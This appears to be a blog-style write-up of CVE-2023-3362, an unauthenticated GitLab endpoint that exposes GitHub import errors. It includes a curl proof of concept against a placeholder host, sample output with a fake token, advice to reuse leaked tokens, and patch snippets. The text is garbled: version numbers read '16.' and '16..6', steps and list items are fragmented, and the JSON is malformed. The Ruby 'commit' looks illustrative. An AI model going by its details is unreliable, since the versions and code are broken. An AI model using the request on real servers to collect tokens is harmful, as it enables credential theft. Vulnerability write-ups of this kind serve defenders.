CVE-2023-3362 - Exploiting an Information Disclosure Vulnerability in GitLab CE/EE GitHub Imports

---

Introduction

On June 2023, a serious information disclosure vulnerability—CVE-2023-3362—was uncovered in GitLab Community Edition (CE) and Enterprise Edition (EE). This issue exposed error messages generated during project imports from GitHub. Shockingly, unauthenticated users (anyone with just a web browser) could access sensitive details relating to these import failures.

In this article, we’ll explain what CVE-2023-3362 is, how it happens, and show you step-by-step how the exploit works, with real code examples. We’ll also link to official resources and help you understand how to stay protected.

CVE-2023-3362 is an information disclosure vulnerability that affects

- All versions of GitLab CE/EE from 16. up to (but not including) 16..6

GitLab 16.1.

The root problem: import error details are accessible without authentication. If someone imported a project from GitHub and an error occurred, anyone on the internet could view details about what went wrong—potentially leaking private GitHub repository names, tokens, or even error logs with sensitive information.

Official Disclosure

- GitLab Security Release 16..6, 16.1.1, 15.11.11, and 14.10.5 released
- MITRE CVE-2023-3362

Why Is This a Big Deal?

GitLab is widely used for both public and private code repositories. Error messages from imports can contain:

Repository names and descriptions

- Usernames/emails

Stack traces or logs mentioning internal infrastructure

Any attacker could gather a list of import failures and use this info for phishing, brute force, or larger attacks. Since no authentication was required, these secrets were “low-hanging fruit.”

No authentication check is present on this endpoint. Anyone can access it.

If you know or can guess the project’s ID or path, you can retrieve error data—no login required.

Proof of Concept (PoC) Exploit

We’ll now demonstrate how this vulnerability can be abused. For this example, let’s use simple curl commands. This is for educational purposes only!

Browsing public GitLab servers for project lists

- Guessing project names (e.g., /namespace/repo)

Let’s say our target’s project is at

https://gitlab.example.com/username/github-imported-project

In vulnerable versions, import error details were exposed at a path similar to

/<namespace>/<project>/-/import/github/status

No authentication required

curl https://gitlab.example.com/username/github-imported-project/-/import/github/status

Step 3: Interpreting the Response

Instead of a login prompt, the attacker might get JSON data showing the import status; on failure, this could include detailed error info, for instance:

{
  "status": "failed",
  "errors": [
    "Could not authenticate with provided token",
    "Failed to fetch file from https://api.github.com/repos/secret-repo";,
    "Token: ghp_1l3ak3d4tt3sttk3n"
  ]
}

API URLs

- Raw OAuth tokens or credentials embedded in error/debug messages

Attempt to use leaked tokens elsewhere

- Recon on internal naming conventions/structure

Mitigation and Fix

Upgrade Immediately:  
GitLab patched this issue in version 16..6 and 16.1.1. If you’re running a vulnerable version, upgrade ASAP!

- Upgrade instructions

Check for Exposure:  
You can review your server’s logs for access to /import/github/status endpoints by unauthenticated IPs outside your normal user base.

What Did the Patch Do?

The fix was simple—but important: GitLab now requires authentication to view import error details. Only project members can see these messages, as should have been the case from the start.

Relevant commit (in Ruby)

before_action :authenticate_user!, only: [:status]

or

def status
  return render_404 unless user_can_read_project?
  # existing error info rendering code
end

Conclusion

CVE-2023-3362 highlights how easy it can be for a seemingly harmless design choice to turn into a critical info leak. Even if a feature is meant to help debug errors, always check that access control is enforced!

If you run or maintain a GitLab server, check your version and update immediately to block outside snoopers from peeking at your import history.

For more details

- GitLab official security release notes for CVE-2023-3362
- CVE Details - CVE-2023-3362
- Mitre CVE entry


*Stay secure, patch fast, and never trust unauthenticated error messages!*

Timeline

Published on: 07/13/2023 03:15:00 UTC
Last modified on: 07/20/2023 20:49:00 UTC